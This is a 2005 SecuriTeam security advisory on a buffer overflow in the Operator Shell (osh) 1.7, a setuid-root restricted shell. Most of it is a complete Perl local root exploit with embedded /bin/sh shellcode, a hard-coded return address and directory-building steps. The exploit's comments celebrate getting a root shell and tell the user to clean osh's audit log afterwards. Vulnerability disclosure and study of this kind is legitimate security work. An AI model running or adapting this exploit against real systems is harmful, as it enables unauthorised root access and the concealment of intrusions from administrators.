[UNIX] Operator Shell (osh) Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 08/28/05

  • Next message: SecuriTeam: "[NT] Buffer Overflow in LeapFTP (Long HOST in lsq)" 
    To: list@securiteam.com
Date: 28 Aug 2005 10:27:35 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Operator Shell (osh) Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

    The Operator Shell (Osh) is a setuid root, security enhanced, restricted
    shell.

    Lack of proper length validation allow attackers to cause buffer overflows
    with OSH and execute arbitrary code with root privileges.

    DETAILS

    Vulnerable Systems:
     * osh version 1.7 and prior

    Osh allocates a buffer of 255 bytes to store MAXPATHLEN, which is defined
    to be 1024-4096 bytes in modern operating systems. If the length of the
    current working directory plus the length of the file name is longer than
    255 bytes, there will be a buffer overflow in the variable temp3[].

    Vulnerable Code:
    handlers.c:364
        char temp3[255];

        if (*file!='/') {
          getcwd(temp3, MAXPATHLEN);
          strcat(temp3,"/");
          strcat(temp3,file);
        }

        ...

    Exploit:
    #!/usr/bin/perl
    #######################################################################
    #
    # OSH 1.7 Exploit #2 (Gonna bang away at this until it's removed ;-)
    #
    # EDUCATIONAL purposes only.... :-)
    #
    # by Charles Stevenson (core) <core at bokeoa.com>
    #
    # Description:
    # The Operator Shell (Osh) is a setuid root, security enhanced, restricted
    # shell. It allows the administrator to carefully limit the access of
    special
    # commands and files to the users whose duties require their use, while
    # at the same time automatically maintaining audit records. The
    configuration
    # file for Osh contains an administrator defined access profile for each
    # authorized user or group.
    #
    # Problem (discovered by Solar Eclipse):
    #
    # handlers.c:364
    #
    # char temp3[255];
    #
    # if (*file!='/') {
    # getcwd(temp3, MAXPATHLEN);
    # strcat(temp3,"/");
    # strcat(temp3,file);
    # }
    #
    # ...
    #
    # "If the length of the current working directory plus the length of
    the
    # file name is longer than 255 bytes, there will be a buffer overflow
    in
    # temp3[]. The size limit of the current direcory is MAXPATHLEN, which
    is
    # defined as 1024 on modern Linux systems. The limit for the file name
    is
    # MAXFNAME, defined as 32 in struct.h:116."
    #
    # [ilja] MAXPATHLEN on recent glibcs is defined as 4096 i believe
    # [ilja] not 1024 as you reported
    # [ilja] on fbsd it would be 1024
    #
    # "This code is in the writable() function, which is called by the
    handlers
    # for built-in cp, vi, rm and test commands, as well as the redirect
    # function." -- Solar Eclipse
    #
    # Risk: Medium since user would have to be in the operator group which
    # the admin would have to grant explicitly and I assume would be
    # a trustworthy individual ;-)
    #
    # Solution:
    # apt-get --purge remove osh
    #
    # greetz to solar eclipse, nemo, andrewg, cnn, arcanum, mercy, amnesia,
    # banned-it, capsyl, sloth, redsand, KF, akt0r, MRX, salvia, truthix, ...
    #
    # irc.pulltheplug.org (#social)
    # 0dd: much <3 & respect
    #
    # 08/12/05 - PoC causes segv with 0x41414141 eip
    # 08/16/05 - PoC _exit(0) ... need shellcode to get past char filters
    # 08/16/05 - Later that night... or morning... ROOTSHELL!! Woot! PTP joint
    # effort on the shellcode.
    #
    # I still find it hard to imagine that anyone would use osh
    # The code is basically beyond repair. Sudo is better.... :-)
    #
    # Don't forget to clean /var/log/osh.log
    #
    #######################################################################
    # PRIVATE - DO NOT DISTRIBUTE - PRIVATE #
    #######################################################################

    # Yanked from one of KF's exploits.. werd brotha ;-) I'm lazy..
    $sc = "\x90" x (511-45) .

    # 45 bytes by anthema. 0xff less
    "\x89\xe6" . # /* movl %esp, %esi */
    "\x83\xc6\x30" . # /* addl $0x30, %esi */
    "\xb8\x2e\x62\x69\x6e" . # /bin /* movl $0x6e69622e, %eax */
    "\x40" . # /* incl %eax */
    "\x89\x06" . # /* movl %eax, (%esi) */
    "\xb8\x2e\x73\x68\x21" . # /sh /* movl $0x2168732e, %eax */
    "\x40" . # /* incl %eax */
    "\x89\x46\x04" . # /* movl %eax, 0x04(%esi) */
    "\x29\xc0" . # /* subl %eax, %eax */
    "\x88\x46\x07" . # /* movb %al, 0x07(%esi) */
    "\x89\x76\x08" . # /* movl %esi, 0x08(%esi) */
    "\x89\x46\x0c" . # /* movl %eax, 0x0c(%esi) */
    "\xb0\x0b" . # /* movb $0x0b, %al */
    "\x87\xf3" . # /* xchgl %esi, %ebx */
    "\x8d\x4b\x08" . # /* leal 0x08(%ebx), %ecx */
    "\x8d\x53\x0c" . # /* leal 0x0c(%ebx), %edx */
    "\xcd\x80"; # /* int $0x80 */

    # 0day shellcodez....
    #
    # Nemo's idea... PTP #social collaborative effort. Searches the stack
    # until it finds a nopsled and executes the shellcode
    $ptp_sc = "\x61\x66\x3d\x90\x90\x75\xf9\x54\xc3";

    # _exit(0);
    #"\x31\xc0\x31\xdb\x40\xcd\x80";

    print "\nOperator Shell (osh) 1.7-13 root exploit\n";
    print "----------------------------------------------\n";
    print "Written by Charles Stevenson <core\@bokeoa.com>\n";
    print "This exploit would not have been near as fun without\n";
    print "the pulltheplug.org community.\n\n";

    # Clear out the environment.
    foreach $key (keys %ENV) { delete $ENV{$key}; }

    # Setup simple env
    $ENV{"HELLCODE"} = "$sc";
    $ENV{"TERM"} = "linux";
    $ENV{"PATH"} = "/usr/local/bin:/usr/bin:/bin";

    chdir("/tmp/");

    # Create the payload...
    mkdir("A"x255,0755);
    chdir("A"x255);
    mkdir("B"x255,0755);
    chdir("B"x255);
    mkdir("C"x118,0755);
    chdir("C"x118);

    #XXX: Commandline can't have: 0x09 0x0a 0x20 0x22 0x24 0x26
    # (what made this fun) 0x3b 0x3c 0x3e 0x7c 0xff

    #$file = pack("l",0xdeadbeef) . "core";
    #$file = pack("l",0x804e36c) . "core";
    $file = pack("l",0x804e36c) . $ptp_sc; # inputfp + 12

    system("touch '$file'");
    system("/usr/sbin/osh test -w '$file'");

    print("cleaning up /tmp\n");
    chdir("../../../");
    system("rm -rf AAAA*/");

    # EOF

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:core@bokeoa.com> Charles
    Stevenson.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Buffer Overflow in LeapFTP (Long HOST in lsq)"

    Relevant Pages